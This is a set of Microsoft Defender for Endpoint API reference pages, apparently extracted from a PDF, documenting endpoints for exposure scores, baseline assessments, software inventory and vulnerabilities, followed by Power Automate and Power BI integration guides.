API Description
Returns information about exposed devices for the specified remediation task.

List exposed devices associated with a
remediation task (id)
URL: GET: /api/remediationTasks/{id}/machineReferences
Permissions
ﾉ Expand table
Application RemediationTasks.Read.All 'Read Threat and Vulnerability

Management vulnerability information'
Delegated (work or RemediationTask.Read.Read 'Read Threat and Vulnerability

school account) Management vulnerability information'
Properties details
ﾉ Expand table
Property (id) Data Description Example

type
id String Device ID w2957837fwda8w9ae7f023dba081059dw8d94503
computerDnsName String Device name PC-SRV2012R2Foo.UserNameVldNet.local
osPlatform String Device WindowsServer2012R2

operating
system
rbacGroupName String Name of the Servers

device group
this device is
associated
with
Example
Request example
HTTP
GET https://api.securitycenter.windows.com/api/remediationtasks/03942ef5-
aecb-4c6e-b555-d6a97013844c/machinereferences
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.windows.com/api/$metadata#MachineReferences",
"value": [
{
"id": "3cb5df6bb3640a2d37ad09fcd357b182d684fafc",
"computerDnsName":
"ComputerPII_2ea21b2d97c9df23c143ad9e3e454cb674232529.DomainPII_21eed80b086e
79bdfa178eabfa25e8be9acfa346.corp.contoso.com",
"osPlatform": "WindowsServer2016",
"rbacGroupName": "UnassignedGroup",
},
{
"id": "3d9b1ca53e8f077199c7dcbfc9dbfa78f9bf1918",
"computerDnsName":
"ComputerPII_001d606fc149567c192747f48fae304b43c0ddba.DomainxPII_21eed80b086
e79bdfa178eabfa25e8be9acfa346.corp.contoso.com",
"osPlatform": "WindowsServer2012R2",
},
{
"id": "3db8b27e6172951d7ea2e2d75945abec56feaf82",
"computerDnsName":
"ComputerPII_ce60cfbjj4b82a091deb5eae560332bba99a9bd7.DomainPII_0bc1aee0fa39
6d175e514bd61a9e7a5b2b07ee8e.corp.contoso.com",
},
{
"id": "3bad326dcda5b53fab47408cd4a7080f3f3cc8ab",
"computerDnsName":
"ComputerPII_b6b35960dd6539d1d1cef5ada02e235e7b357408.DomainPII_21eed80b089e
76bdfa178eadfa25e8de9acfa346.corp.contoso.com",
"osPlatform": "WindowsServer2012R2",
}
]
}
See also
Get one remediation activity by Id
 Tip
Feedback

Score resource type
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Methods
ﾉ Expand table
Get exposure score Score Get the organizational exposure score.

Method
Get device secure score Return Type
Score Description
Get the organizational device secure score.
List exposure score by device group Score List scores by device group.
７ Note
Properties
ﾉ Expand table
Score Double The current score.
Time DateTime The date and time in which the call for this API was made.
RbacGroupName String The device group name.
RbacGroupId String The device group ID.
 Tip
Feedback

List exposure score by device group
Article • 11/15/2023
Applies to:

７ Note
 Tip
） Important

Retrieves the exposure score for each machine group.
Permissions
ﾉ Expand table
Application Score.Read.All 'Read Threat and Vulnerability Management

score'
Delegated (work or school Score.Read 'Read Threat and Vulnerability Management

account) score'
HTTP request
HTTP
GET /api/exposureScore/ByMachineGroups
Request headers
ﾉ Expand table
Authorization String Bearer {token}.Required.
Request body
Empty
Response
If successful, this method returns 200 OK, with a list of exposure score per device group
data in the response body.
Example
Example request
HTTP
GET
https://api.securitycenter.microsoft.com/api/exposureScore/ByMachineGroups
Example response
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#ExposureScore",
"value": [
{
"time": "2019-12-03T09:51:28.214338Z",
"score": 41.38041766305988,
"rbacGroupName": "GroupOne"
},
{
"time": "2019-12-03T09:51:28.2143399Z",
"score": 37.403726933165366,
}
...
]
}
Related topics
Defender Vulnerability Management exposure score
 Tip
Feedback
Get exposure score
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Retrieves the organizational exposure score.
Permissions
ﾉ Expand table

score'

account) score'
HTTP request
HTTP
GET /api/exposureScore
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK, with the exposure data in the response body.
Example
Request
HTTP
GET https://api.securitycenter.microsoft.com/api/exposureScore
Response
７ Note
The response list shown here may be truncated for brevity.
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#ExposureScore/$entit
y",
"time": "2019-12-03T07:23:53.280499Z",
"score": 33.491554051195706
}
See also
Defender Vulnerability Management exposure score
 Tip
Feedback

Get device secure score
Article • 09/27/2023
Applies to:

７ Note
 Tip
Retrieves your Microsoft Secure Score for Devices. A higher Microsoft Secure Score for
Devices means your endpoints are more resilient from cybersecurity threat attacks.
Permissions
ﾉ Expand table

score'

account) score'
HTTP request
HTTP
GET /api/configurationScore
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK, with the device secure score data in the
response body.
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/configurationScore
Response example
７ Note
The response list shown here may be truncated for brevity.
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#ConfigurationScore/$
entity",
"time": "2019-12-03T09:15:58.1665846Z",
"score": 340
}
See also
 Tip
Feedback

Export security baselines assessment per
device
Article • 09/27/2023
Applies to:


There are different API calls to get different types of data. In general, each API call
contains the requisite data for devices in your organization.
the next results.
contains URLs to download all the data from Azure Storage. You can download
like.
７ Note
Unless indicated otherwise, all export security baseline assessment methods listed
are full export and by device (also referred to as per device)
1. Export security baselines assessment (JSON
response)

Returns all security baselines assessments for all devices, on a per-device basis. It returns
a table with a separate entry for every unique combination of DeviceId, ProfileId,
ConfigurationId.
1.2 Permissions
ﾉ Expand table
Application SecurityBaselinesAssessment.Read.All 'Read all security baselines

assessments information'
Delegated (work or SecurityBaselinesAssessment.Read 'Read security baselines

school account) assessments information'
1.3 Limitations
1.4 Parameters
$top: Number of results to return (doesn't return @odata.nextLink and so doesn't
pull all the data).
1.5 HTTP request

HTTP
GET /api/machines/baselineComplianceAssessmentByMachine
７ Note
Each record is approximately 1 KB of data. You should take this into account when
choosing the correct pageSize parameter.
The properties defined in the following table are listed alphabetically by property
ID. When running this API, the resulting output will not necessarily be returned in
the same order listed in this table.
ﾉ Expand table

type
configurationId String Unique identifier for a specific configuration in

the baseline benchmark.
profileId String Unique identifier for the profile assessed.
deviceId String Unique identifier for the device in the service.
deviceName String Fully qualified domain name (FQDN) of the

device.
isApplicable Boolean Indicates whether the configuration is applicable

to this device.
isCompliant Boolean Indicates whether the device is compliant with

configuration.
id String Unique identifier for the record, which is a

combination of DeviceId, ProfileId, and
ConfigurationId.
osVersion String Specific version of the operating system running

on the device.
osPlatform String Operating system platform running on the

device. Specific operating systems with variations
Windows 11. See MDVM supported operating
systems and platforms for details.
type
rbacGroupId Int The role-based access control (RBAC) group Id. If

the device isn't assigned to any RBAC group, the
value will be "Unassigned." If the organization
doesn't contain any RBAC groups, the value will
be "None."
rbacGroupName String The role-based access control (RBAC) group. If

the device isn't assigned to any RBAC group, the
value will be "Unassigned." If the organization
doesn't contain any RBAC groups, the value will
be "None."
DataCollectionTimeOffset DateTime The time the data was collected from the device.
This field may not appear if no data was
collected.
ComplianceCalculationTimeOffset DateTime The time the assessment calculation was made.
RecommendedValue String Set of expected values for the current device

setting to be complaint.
CurrentValue String Set of detected values found on the device.
Source String The registry path or other location used to

determine the current device setting.
1.7 Example

HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/BaselineComplianceAsse
ssmentByMachine

JSON
{
"@odata.context": " https://api.securitycenter.microsoft.com
/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetBaselineAsse
ssment)",
"value": [
{
"id": "0000682575d5d473e82ed4d8680425d152411251_9e1b90be-e83e-485b-a5ec-
4a429412e734_1.1.1",
"configurationId": "1.1.1",
"deviceId": "0000682575d5d473242222425d152411251",
"deviceName": "
ComputerPII_365f5c0bb7202c163937dad3d017969b2d760eb4.DomainPII_29596 ",
"profileId": "9e1b90be-e83e-485b-a5ec-4a429412e734",
"osVersion": "10.0.17763.2330",
"rbacGroupId": 86,
"dataCollectionTimeOffset": "2021-12-22T00:08:02.478Z",
"recommendedValue": [
"Greater than or equal '24'"
],
"currentValue": [
"24"
],
"source": [
"password_hist_len"
],
}
2. Export security baselines assessment (via

files)

Returns all security baselines assessments for all devices, on a per-device basis. It returns
a table with a separate entry for every unique combination of DeviceId, ProfileId,
ConfigurationId.
2.2 Limitations
2.3 URL
HTTP
GET /api/machines/BaselineComplianceAssessmentExport
2.4 Parameters
(Maximum 24 hours).
７ Note
parameter.
ﾉ Expand table
the organization.
2.6 Example

HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/BaselineComplianceAsse
ssmentExport
JSON
{
"@odata.context": "https://api.securitycenter.
contoso.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesRespon
se",
"exportFiles":
[
"https://tvmexportexternalstgeus.blob.core.windows.net/temp-1ebd3d09-
d06a-4aad-ab80-ebc536cec61c/2021-12-
22/0500/BaselineAssessmentExport/json/OrgId= OrgId=<Org Id>/_RbacGroupId=
<Rbac Group Id>/part-00000-c09dfd00-2278-4735-b23a-
71733751fcbc.c000.json.gz?sv=ABCD",
"https://tvmexportexternalstgeus.blob.core.windows.net/temp-1ebd3d09-
d06a-4aad-ab80-ebc536cec61c/2021-12-
22/0500/BaselineAssessmentExport/json/OrgId=<Org Id>/_RbacGroupId=<Rbac
Group Id>/part-00001-c09dfd00-2278-4735-b23a-71733751fcbc.c000.json.gz?sv=
ABCD",
],
}
See also
Get security baselines assessment profiles
Get security baselines assessment configurations
 Tip
Feedback

List all security baselines assessment
profiles
Article • 09/27/2023
Applies to:


1. Get security baselines assessment profiles

This API retrieves a list of all security baselines assessment profiles created by the
organization.
1.1 Parameters
Supports OData V4 queries.
$filter on : id,name, operatingSystem, operatingSystemVersion, status,
settingsNumber, passedDevices, totalDevices
$skip.
1.2 HTTP request

HTTP
GET:/api/baselineProfiles
1.3 Request headers
ﾉ Expand table
1.4 Properties
ﾉ Expand table
Id String Unique identifier for the specific baseline profile.
name String The profile name.
description String The profile description.
benchmark String The profile benchmark.
version String The profile version.
operatingSystem String The profile applicable operating system.
operatingSystemVersion String The profile applicable operating system version.
status Boolean Indicates whether the profile is active or not
complianceLevel String The compliance level chosen for the profile.
settingsNumber Int Number of selected configurations in the profile.
createdBy String The user that created this profile.
lastUpdatedBy DateTime The last user to modify this profile.
createdOnTimeOffset DateTime The date and time the profile was created.
lastUpdateTimeOffset DateTime The date and time the profile was last updated.
passedDevices Int The number of devices applicable to this profile that are
compliant with all of the profile configurations.
totalDevices Int Number of devices applicable to this profile.
1.5 Example

HTTP
GET https://api.securitycenter.microsoft.com/api/baselineProfiles

JSON
{
"@odata.context": "https://
api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsD
efenderATP.api.PublicBaselineProfileDto)",
"value":
[
{
"id": "02bcbb9d-d197-479e-811e-1cd5a6f9f8fa",
"name": "Windows 10 build 1909 CIS profile",
"description": "important",
"benchmark": "CIS",
"version": "1.0.0",
"operatingSystem": "Windows 10",
"operatingSystemVersion": "1909",
"status": true,
"complianceLevel": "Level 1 (L1) - Corporate/Enterprise
Environment (general use)",
"settingsNumber": 51,
"createdBy": "user@org.net",
"lastUpdatedBy": null,
"createdOnTimestampUTC": "0001-01-01T00:00:00Z",
"lastUpdateTimestampUTC": "0001-01-01T00:00:00Z",
"passedDevices": 0,
"totalDevices": 10
}
]
}
See also
Export security baselines assessment
Get security baselines assessment configurations
 Tip
Feedback

List configurations in active baseline
profiles
Article • 09/27/2023
Applies to:


1.API description
This API retrieves a list of the configurations being assessed in active baseline profiles.
1.1 Parameters
Supports OData V4 queries
$filter on: id , category , name , CCE
$skip
1.2 HTTP request

HTTP
GET /api/baselineConfigurations
1.3 Request headers
ﾉ Expand table
1.4 Response
If successful, this method returns 200 OK with the list of baseline configurations in the
body.
1.5 Properties
ﾉ Expand table
uniqueId String Identifier for the specific configuration across baseline

benchmarks.
Id String Identifier of the specific configuration in the baseline

benchmark.
benchmarkName String The name of the benchmark.
benchmarkVersion String The version of the benchmark. May contain operating system
details.
name String The configuration name at it appears in the benchmark.
description String The configuration description as it appears in the benchmark.
category String The configuration category as it appears in the benchmark.
complianceLevels String The compliance level of the benchmark where this

configuration appears.
cce Int The CCE for this configuration as it appears in the benchmark.
rationale String The rationale for this configuration as it appears in the

benchmark. For STIG benchmark this isn't supplied for this
configuration.
source Array Array of the registry paths or other locations used to

[String] determine the current device setting.
recommendedValue Array Array of the recommended value for each source returned in
[String] the 'source' property array (values returned in the same order
as the source property array).
remediation String The recommended steps to remediate.
isCustom Boolean True if the configuration is customized, false if not.
1.6 Example

HTTP
GET https://api.securitycenter.microsoft.com/api/baselineConfigurations

JSON
{
"@odata.context": " https://api-
df.securitycenter.microsoft.com/api/$metadata#BaselineConfigurations ",
"value": [
{
"id": "9.3.9",
"uniqueId": "CIS_1.4.0-windows_server_2016_9.3.9",
"benchmarkName": "CIS",
"benchmarkVersion": "1.4.0-windows_server_2016",
"name": "(L1) Ensure 'Windows Firewall: Public: Logging: Log
dropped packets' is set to 'Yes'",
"description": "<p xmlns:xhtml=\"http://www.w3.org/1999/xhtml\">
Use this option to log when Windows Firewall with Advanced Security discards
an inbound packet for any reason. The log records why and when the packet
was dropped. Look for entries with the word <span
class=\"inline_block\">DROP</span> in the action column of the log.
</p>",
"category": "Public Profile",
"complianceLevels": [
"Level 1 - Domain Controller",
"Level 1 - Member Server",
"Level 2 - Domain Controller",
"Level 2 - Member Server"
],
"cce": "CCE-35116-3",
"rationale": "<p xmlns:xhtml=\"http://www.w3.org/1999/xhtml\">If
events are not recorded it may be difficult or impossible to determine the
root cause of system problems or the unauthorized activities of malicious
users.</p>",
"remediation": "<div
xmlns:xhtml=\"http://www.w3.org/1999/xhtml\"> <p> <p> To establish
the recommended configuration via GP, set the following UI path to
<span class=\"inline_block\">Yes</span> : </p> <code
class=\"code_block\">Computer Configuration\\Policies\\Windows
Settings\\Security Settings\\Windows Firewall with Advanced
Security\\Windows Firewall with Advanced Security\\Windows Firewall
Properties\\Public Profile\\Logging Customize\\Log dropped packets </code>
<p class=\"bold\">Impact:</p> <p> <p>Information about dropped
packets will be recorded in the firewall log file.</p> </p> </p>
</div>",
"recommendedValue": [
"Equals '1'"
],
"source": [
"hkey_local_machine\\software\\policies\\microsoft\\windowsfirewall\\publicp
rofile\\logging\\logdroppedpackets"
],
"isCustom": false
},
]
}
See also
Export security baselines assessment
Get security baselines assessment profiles
 Tip
Feedback

Software resource type
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Methods
ﾉ Expand table
List software Software collection List the organizational software inventory
Get software by ID Software Get a specific software by its software ID
List software version Distribution List software version distribution by software ID

distribution collection
List machines by software MachineRef Retrieve a list of devices that are associated
collection with the software ID
List vulnerabilities by Vulnerability Retrieve a list of vulnerabilities associated with

software collection the software ID
Get missing KBs KB collection Get a list of missing KBs associated with the
software ID
Properties
ﾉ Expand table
id String Software ID
Name String Software name
Vendor String Software publisher name
Weaknesses Long Number of discovered vulnerabilities
publicExploit Boolean Public exploit exists for some of the vulnerabilities
activeAlert Boolean Active alert is associated with this software
exposedMachines Long Number of exposed devices
impactScore Double Exposure score impact of this software
 Tip
Feedback

List software inventory API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves the organization software inventory.
$filter on: id , name , and vendor properties.
$skip .
Permissions
ﾉ Expand table


HTTP request
HTTP
GET /api/Software
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the software inventory in the body.
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/Software
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Software",
"value": [
{
"id": "microsoft-_-edge",
"name": "edge",
"weaknesses": 467,
}
...
]
}
Related topics
 Tip
Feedback

Get software by ID
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Retrieves software details by ID.
Permissions
ﾉ Expand table


HTTP request
HTTP
GET /api/Software/{Id}
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the specified software data in the body.
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/Software/microsoft-_-edge
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Software/$entity",
"id": "microsoft-_-edge",
"name": "edge",
"weaknesses": 467,
}
Related topics
 Tip
Feedback

List software version distribution
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Retrieves a list of your organization's software version distribution.
Permissions
ﾉ Expand table


HTTP request
HTTP
GET /api/Software/{Id}/distributions
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with a list of software distributions data in the
body.
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/Software/microsoft-_-
edge/distributions
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Distributions",
"value": [
{
"version": "11.0.17134.1039",
"installations": 1,
"vulnerabilities": 11
},
{
"version": "11.0.18363.535",
"installations": 750,
"vulnerabilities": 0
}
...
]
}
Related topics
 Tip
Feedback
List devices by software
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Retrieve a list of device references that has this software installed.
Permissions
ﾉ Expand table


HTTP request
HTTP
GET /api/Software/{Id}/machineReferences
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK and a list of devices with the software installed
in the body.
Example
Request example
HTTP
edge/machineReferences
Response example
JSON
{
"@odata.context":
"value": [
{
"id": "7c7e1896fa39efb0a32a2cf421d837af1b9bf762",
"computerDnsName": "dave_desktop",
},
{
"id": "7d5cc2e7c305e4a0a290392abf6707f9888fda0d",
"computerDnsName": "jane_PC",
}
...
]
}
Related topics
 Tip
Feedback

List vulnerabilities by software
Article • 11/15/2023
Applies to:

７ Note
 Tip
） Important

Retrieve a list of vulnerabilities in the installed software.
Permissions
ﾉ Expand table


school account) Software information'
HTTP request
HTTP
GET /api/Software/{Id}/vulnerabilities
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with a list of vulnerabilities exposed by the
specified software.
Example
Request example
HTTP
edge/vulnerabilities
Response example
JSON
{
"@odata.context":
"value": [
{
"id": "CVE-2017-0140",
"name": "CVE-2017-0140",
"description": "A security feature bypass vulnerability
exists when Microsoft Edge improperly handles requests of different origins.
The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP)
restrictions, and to allow requests that should otherwise be ignored. An
attacker who successfully exploited the vulnerability could force the
browser to send data that would otherwise be restricted.In a web-based
attack scenario, an attacker could host a specially crafted website that is
designed to exploit the vulnerability through Microsoft Edge and then
convince a user to view the website. The attacker could also take advantage
of compromised websites, and websites that accept or host user-provided
content or advertisements. These websites could contain specially crafted
content that could exploit the vulnerability.The security update addresses
the vulnerability by modifying how affected Microsoft Edge handles
different-origin requests.",
"cvssV3": 4.2,
"publishedOn": "2017-03-14T00:00:00Z",
"updatedOn": "2019-10-03T00:03:00Z",
"exploitTypes": [],
"exploitUris": []
}
...
]
}
 Tip
Feedback

Get missing KBs by software ID
Article • 09/27/2023
Applies to:

７ Note
 Tip
Retrieves missing KBs (security updates) by software ID
Permissions
ﾉ Expand table


HTTP request
HTTP
GET /api/Software/{Id}/getmissingkbs
Request header
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK, with the specified software missing kb data in
the body.
Example
Request
HTTP
edge/getmissingkbs
Response
JSON
{
"@odata.context":
.windowsDefenderATP.api.PublicProductFixDto)",
"value": [
{
"id": "4540673",
"name": "March 2020 Security Updates",
"productsNames": [
"edge"
],
"url":
"https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4540673",
"machineMissedOn": 240,
"cveAddressed": 14
},
...
]
}
Related topics
 Tip
Feedback

User resource type
Article • 11/15/2023
Applies to:

７ Note
 Tip
ﾉ Expand table
List User related alerts alert collection List all the alerts that are associated with a user.
List User related devices machine collection List all the devices that were logged on by a user.
 Tip
Feedback

Get user-related alerts API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves a collection of alerts related to a given user ID.
Limitations
Permissions
ﾉ Expand table
７ Note
more information, see Create and manage roles.
HTTP request
HTTP
GET /api/users/{id}/alerts
The ID is not the full UPN, but only the user name. (for example, to retrieve alerts for
user1@contoso.com use /api/users/user1/alerts)
Request headers
ﾉ Expand table

Request body
Empty
Response
If successful and user exists - 200 OK. If the user does not exist - 200 OK with an empty
set.
Example
Request
HTTP
GET https://api.securitycenter.microsoft.com/api/users/user1/alerts
 Tip
Feedback

Get user-related machines API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves a collection of devices related to a given user ID.
Limitations
Permissions
ﾉ Expand table

information'

account)

account)
７ Note
Response will include only devices that the user can access, based on device
group settings. For more information, see Create and manage device groups.
HTTP request
HTTP
GET /api/users/{id}/machines
The ID is not the full UPN, but only the user name. (for example, to retrieve machines
for user1@contoso.com use /api/users/user1/machines)
Request headers
ﾉ Expand table

Request body
Empty
Response
If successful and user exists - 200 OK with list of machine entities in the body. If user
does not exist - 200 OK with an empty set.
Example
Request
HTTP
GET https://api.securitycenter.microsoft.com/api/users/user1/machines
 Tip
Feedback

Vulnerability resource type
Article • 01/31/2024
Applies to:

７ Note
 Tip
） Important

Methods
ﾉ Expand table
Get all vulnerabilities Vulnerability Retrieves a list of all the vulnerabilities affecting
collection the organization
Get vulnerability by Id Vulnerability Retrieves vulnerability information by its Id
List devices by MachineRef Retrieve a list of devices that are associated with
vulnerability collection the vulnerability Id
List vulnerabilities by Vulnerability Retrieves a list of all the vulnerabilities affecting

machine and software the organization per machine and software.
Properties
ﾉ Expand table
Id String Vulnerability Id
Name String Vulnerability title
Description String Vulnerability description
Severity String Vulnerability Severity. Possible values are: Low, Medium,

High, or Critical
cvssV3 Double CVSS v3 score
cvssVector String A compressed textual representation that reflects the values

used to derive the score
exposedMachines Long Number of exposed devices
publishedOn DateTime Date when vulnerability was published
updatedOn DateTime Date when vulnerability was updated
publicExploit Boolean Public exploit exists
exploitVerified Boolean Exploit is verified to work
exploitInKit Boolean Exploit is part of an exploit kit
exploitTypes String Exploit affect. Possible values are: Local privilege escalation,
collection Denial of service, or Local
exploitUris String Exploit source URLs

collection
CveSupportability String Possible values are: Supported, Not Supported, or

collection SupportedInPremium
 Tip
Feedback

List vulnerabilities
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

API description
Retrieves a list of all vulnerabilities.
$filter on: id , name , description , cvssV3 , publishedOn , severity , and updatedOn
properties.
$skip .
Permissions
ﾉ Expand table


HTTP request
HTTP
GET /api/vulnerabilities
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the list of vulnerabilities in the body.
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/Vulnerabilities
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Vulnerabilities",
"value": [
{
"id": "CVE-2019-0608",
"name": "CVE-2019-0608",
"description": "A spoofing vulnerability exists when Microsoft
Browsers does not properly parse HTTP content. An attacker who successfully
exploited this vulnerability could impersonate a user request by crafting
HTTP queries. The specially crafted website could either spoof content or
serve as a pivot to chain an attack with other vulnerabilities in web
services.To exploit the vulnerability, the user must click a specially
crafted URL. In an email attack scenario, an attacker could send an email
message containing the specially crafted URL to the user in an attempt to
convince the user to click it.In a web-based attack scenario, an attacker
could host a specially crafted website designed to appear as a legitimate
website to the user. However, the attacker would have no way to force the
user to visit the specially crafted website. The attacker would have to
convince the user to visit the specially crafted website, typically by way
of enticement in an email or instant message, and then convince the user to
interact with content on the website.The update addresses the vulnerability
by correcting how Microsoft Browsers parses HTTP responses.",
"cvssV3": 4.3,
"cvssVector":
"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C",
"publishedOn": "2019-10-08T00:00:00Z",
"updatedOn": "2019-12-16T16:20:00Z",
"exploitTypes": [],
"exploitUris": [],
"CveSupportability": "supported"
}
]
See also
 Tip
Feedback

List vulnerabilities by machine and
software
Article • 11/15/2023
Applies to:

７ Note
 Tip
Retrieves a list of all the vulnerabilities affecting the organization per machine and
software.
If the vulnerability has a fixing KB, it will appear in the response.

The OData's $filter query is supported on: id , cveId , machineId , fixingKbId ,
productName , productVersion , severity , and productVendor properties.
$skip
 Tip
This is great API for Power BI integration.
Permissions
ﾉ Expand table


HTTP request
HTTP
GET /api/vulnerabilities/machinesVulnerabilities
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the list of vulnerabilities in the body.
Example
Request example
HTTP
GET
https://api.securitycenter.microsoft.com/api/vulnerabilities/machinesVulnera
bilities
Response example
JSON
{
"@odata.context":
.windowsDefenderATP.api.PublicAssetVulnerabilityDto)",
"value": [
{
"id": "5afa3afc92a7c63d4b70129e0a6f33f63a427e21-_-CVE-2020-6494-
_-microsoft-_-edge_chromium-based-_-81.0.416.77-_-",
"cveId": "CVE-2020-6494",
"machineId": "5afa3afc92a7c63d4b70129e0a6f33f63a427e21",
"fixingKbId": null,
"productName": "edge_chromium-based",
"productVendor": "microsoft",
"productVersion": "81.0.416.77",
"severity": "Low"
},
{
"id": "7a704e17d1c2977c0e7b665fb18ae6e1fe7f3283-_-CVE-2016-3348-
_-microsoft-_-windows_server_2012_r2-_-6.3.9600.19728-_-3185911",
"cveId": "CVE-2016-3348",
"machineId": "7a704e17d1c2977c0e7b665fb18ae6e1fe7f3283",
"fixingKbId": "3185911",
"productName": "windows_server_2012_r2",
"productVendor": "microsoft",
"productVersion": "6.3.9600.19728",
"severity": "Low"
},
...
]
}
See also
 Tip
Feedback

Get vulnerability by ID
Article • 11/15/2023
Applies to:

７ Note
 Tip
） Important

Retrieves vulnerability information by its ID.
Permissions
ﾉ Expand table


HTTP request
HTTP
GET /api/vulnerabilities/{cveId}
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the vulnerability information in the body.
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/Vulnerabilities/CVE-2019-
0608
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Vulnerabilities/$ent
ity",
"id": "CVE-2019-0608",
"name": "CVE-2019-0608",
"description": "A spoofing vulnerability exists when Microsoft Browsers
does not properly parse HTTP content. An attacker who successfully exploited
this vulnerability could impersonate a user request by crafting HTTP
queries. The specially crafted website could either spoof content or serve
as a pivot to chain an attack with other vulnerabilities in web services.To
exploit the vulnerability, the user must click a specially crafted URL. In
an email attack scenario, an attacker could send an email message containing
the specially crafted URL to the user in an attempt to convince the user to
click it.In a web-based attack scenario, an attacker could host a specially
crafted website designed to appear as a legitimate website to the user.
However, the attacker would have no way to force the user to visit the
specially crafted website. The attacker would have to convince the user to
visit the specially crafted website, typically by way of enticement in an
email or instant message, and then convince the user to interact with
content on the website.The update addresses the vulnerability by correcting
how Microsoft Browsers parses HTTP responses.",
"cvssV3": 4.3,
"publishedOn": "2019-10-08T00:00:00Z",
"updatedOn": "2019-12-16T16:20:00Z",
"exploitTypes": [],
"exploitUris": []
}
Related topics
 Tip
Feedback

List devices by vulnerability
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Retrieves a list of devices affected by a vulnerability.
Permissions
ﾉ Expand table


HTTP request
HTTP
GET /api/vulnerabilities/{cveId}/machineReferences
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the vulnerability information in the body.
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/vulnerabilities/CVE-2019-
0608/machineReferences
Response example
JSON
{
"@odata.context":
"value": [
{
"id": "235a2e6278c63fcf85bab9c370396972c58843de",
"computerDnsName": "h1mkn_PC",
},
{
"id": "afb3f807d1a185ac66668f493af028385bfca184",
"computerDnsName": "chat_Desk ",
}
...
]
}
Related topics
 Tip
Feedback
 Yes  No

How to use Power Automate Connector
to set up a Flow for events
Article • 07/18/2023
Applies to:

Automating security procedures is a standard requirement for every modern Security

Operations Center (SOC). For SOC teams to operate in the most efficient way,
automation is a must. Use Microsoft Power Automate to help you create automated
workflows and build an end-to-end procedure automation within a few minutes.
Microsoft Power Automate supports different connectors that were built exactly for that.
Use this article to guide you in creating automations that are triggered by an event, such
as when a new alert is created in your tenant. Microsoft Defender API has an official
Power Automate Connector with many capabilities.

７ Note
For more information about premium connectors licensing prerequisites, see

Licensing for premium connectors.
Usage example
The following example demonstrates how to create a Flow that is triggered anytime a
new Alert occurs on your tenant. You'll be guided on defining what event starts the flow
and what next action will be taken when that trigger occurs.
1. Log in to Microsoft Power Automate .

2. Go to My flows > New > Automated-from blank.
3. Choose a name for your Flow, search for "Microsoft Defender ATP Triggers" as the
trigger, and then select the new Alerts trigger.

Now you have a Flow that is triggered every time a new Alert occurs.
All you need to do now is choose your next steps. For example, you can isolate the
device if the Severity of the Alert is High and send an email about it. The Alert trigger
provides only the Alert ID and the Machine ID. You can use the connector to expand
these entities.
Get the Alert entity using the connector

1. Choose Microsoft Defender ATP for the new step.
2. Choose Alerts - Get single alert API.
3. Set the Alert ID from the last step as Input.
Isolate the device if the Alert's severity is High

1. Add Condition as a new step.
2. Check if the Alert severity is equal to High.
If yes, add the Microsoft Defender ATP - Isolate machine action with the Machine
ID and a comment.
3. Add a new step for emailing about the Alert and the Isolation. There are multiple
email connectors that are easy to use, such as Outlook or Gmail.
4. Save your flow.

You can also create a scheduled flow that runs Advanced Hunting queries and much
more!
Related topic
 Tip
Feedback

Create custom reports using Power BI
Article • 02/22/2024
Applies to:

７ Note
 Tip
In this section, you learn to create a Power BI report on top of Defender for Endpoint
APIs.
The first example demonstrates how to connect Power BI to Advanced Hunting API, and
the second example demonstrates a connection to our OData APIs, such as Machine
Actions or Alerts.
Connect Power BI to Advanced Hunting API

1. Open Microsoft Power BI.
2. Select Get Data > Blank Query.
3. Select Advanced Editor.
4. Copy the below and paste it in the editor:
let
